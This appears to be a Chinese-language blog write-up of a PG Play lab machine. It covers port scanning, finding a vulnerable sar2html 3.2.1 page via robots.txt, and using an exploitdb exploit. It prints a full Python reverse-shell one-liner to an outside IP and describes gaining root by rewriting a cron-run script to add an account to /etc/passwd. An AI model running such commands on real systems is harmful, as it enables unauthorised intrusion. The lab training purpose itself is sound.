iT邦幫忙

2023 iThome 鐵人賽

DAY 4
0

防雷頁


























可能的遺漏

  • web 目錄常見檔案.
  • web 頁面功能和版本.
  • 進入機器後, 檢查機器排程.

摘要

  • web 目錄常見檔案(robots.txt).
  • web 頁面功能和版本(sar2html Ver 3.2.1) 在 exploitdb 有 exploit 可以用.
  • 進入機器後, 檢查機器排程(/etc/crontab), 有一個定期排程的 bash script 可以修改.

Walkthrough

  • 先透過 nmap 確認開什麼 port 和什麼服務(old log)
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-27 14:32 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 14:32
Scanning 192.168.223.35 [2 ports]
Completed Ping Scan at 14:32, 0.27s elapsed (1 total hosts)
Initiating Connect Scan at 14:32
Scanning 192.168.223.35 [1000 ports]
Discovered open port 80/tcp on 192.168.223.35
Discovered open port 22/tcp on 192.168.223.35
Increasing send delay for 192.168.223.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Completed Connect Scan at 14:33, 18.64s elapsed (1000 total ports)
Initiating Service scan at 14:33
Scanning 2 services on 192.168.223.35
Completed Service scan at 14:33, 6.56s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.223.35.
Initiating NSE at 14:33
Completed NSE at 14:33, 1.16s elapsed
Initiating NSE at 14:33
Completed NSE at 14:33, 1.10s elapsed
Nmap scan report for 192.168.223.35
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds
  • dirb 掃描網站目錄
    https://ithelp.ithome.com.tw/upload/images/20230918/200782984IEjON6Wa4.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298WDeMaYkytr.png

  • 手動檢查網站(phpinfo.php 可以看一下, 有一些有用的資訊)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298osN6DIyvTI.png

  • 手動檢查網站(robots.txt 可以看一下, 有時候會有能用的資訊)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298lSWoS7ARLI.png

  • 手動檢查網站(跟進 robots.txt 提示目錄, sar2HTML, 是功能頁面)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298CXDKP1k3EW.png

  • exploitdb(search sar2html, 有 exploit 可以嘗試)
    https://ithelp.ithome.com.tw/upload/images/20230918/200782988i7ewPcrzF.png

  • exploitdb(49344 能用, 取得 shell)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298gv63yq3aKy.png

  • reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.227",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

https://ithelp.ithome.com.tw/upload/images/20230918/20078298LCOoIsj2k1.png

  • 使用 python 取得 pty shell
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • get local.txt
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298OBvY57wFnh.png

  • 檢查 /etc/crontab, 發現有趣的東西, 一路追蹤下去, 找到可寫入的 bash script
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298Ai1Hr5Tyn3.png

  • 使用 openssl 產生要寫入 /etc/passwd 的密碼資訊
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298G6J4etp3RT.png

  • 構造 bash script(這邊做法就非常多種, 請按照自己的喜好進行), 會寫入 /etc/passwd, 新增 root 權限的帳號(demo)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298fMBJuwvxDI.png

  • 檢查 /etc/passwd, 確認帳號新增
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298kSWxobUBty.png

  • 登入 demo 高權限帳號
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298CRzpA4RUcY.png

  • get proof.txt
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298Dv8yfRlJXK.png

ref


上一篇
[Day 03] PG Play Shakabrah Writeup
下一篇
[Day 05] PG Play FunboxEasy Writeup
系列文
PG Play 怎麼玩都不累 - 靶機 writeup 思路分享30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言